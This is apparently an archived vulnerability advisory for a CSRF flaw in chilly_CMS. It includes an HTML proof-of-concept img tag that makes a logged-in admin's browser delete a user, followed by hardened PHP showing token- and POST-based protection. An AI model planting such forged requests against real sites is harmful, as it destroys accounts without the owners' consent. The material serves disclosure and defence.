
ChillyCMS - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-16 
date_updated:  
verified: 1 
codes: OSVDB-63029 
tags: 
aliases:  
screenshot_url:  
application_url: 

=======================================================================

                    chilly_CMS CSRF Vulnerability

=======================================================================

  # Vulnerability found in- Admin module

  # email         Pratulag@yahoo.com

  # company       aksitservices

  # Credit by     Pratul Agrawal

  # Software      chilly_CMS

  # Category      CMS / Portals

  # Platform      php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)



  #  Proof of concept   #


   HTML page that deletes an admin user through cross-site request forgery when it is loaded by an authenticated administrator

   ................................................................................................................

   <html>
     <body>
       <!-- The browser sends the admin's session cookie with this GET request;
            the delete action has no token check, so it is carried out. -->
       <img src="http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]" />
     </body>
   </html>

   ................................................................................................................



  After the page has loaded, refresh the admin user list and you can see that the user with the supplied ID has been deleted automatically.
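  The weakness the PoC relies on is a state-changing action that runs on a bare GET request with nothing but the session cookie as proof of intent. The following is an added example, not chilly_CMS code: it shows how such a delete handler can be protected with a per-session CSRF token compared in constant time and a POST-only requirement. The handler layout, the session key and the delete_user() function are assumptions for illustration.

```php
<?php
// Added example, not chilly_CMS code. Protects a state-changing admin action
// (deleting a user) against CSRF. Assumes session-based admin authentication
// and a hypothetical existing delete_user(int $id) function.

session_start();

// Issue one random token per session and embed it in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept a state change only via POST and only with the matching token.
// hash_equals() compares in constant time so the token cannot be timed out.
function csrf_check(array $post, string $method): bool {
    if ($method !== 'POST') {
        return false;                       // a forged <img> GET stops here
    }
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Hardened handler for action=deleteuser.
if (($_REQUEST['action'] ?? '') === 'deleteuser') {
    if (!csrf_check($_POST, $_SERVER['REQUEST_METHOD'])) {
        http_response_code(403);
        // Log the failure: repeated hits here are a useful detection signal.
        error_log('CSRF check failed for deleteuser from ' . $_SERVER['REMOTE_ADDR']);
        exit('Forbidden');
    }
    $id = filter_var($_POST['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Bad id');
    }
    delete_user($id);                       // hypothetical existing function
    exit('Deleted');
}

// Admin UI: the delete control is a POST form carrying the token.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="usersgroups.site.php">'
   . '<input type="hidden" name="action" value="deleteuser">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input type="number" name="id" required> <button>Delete user</button></form>';
```

  Marking the session cookie SameSite=Lax via session_set_cookie_params() adds defence in depth, but the token check is what makes the handler itself safe regardless of browser behaviour.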


  # If you have any questions, comments, or concerns, feel free to contact me.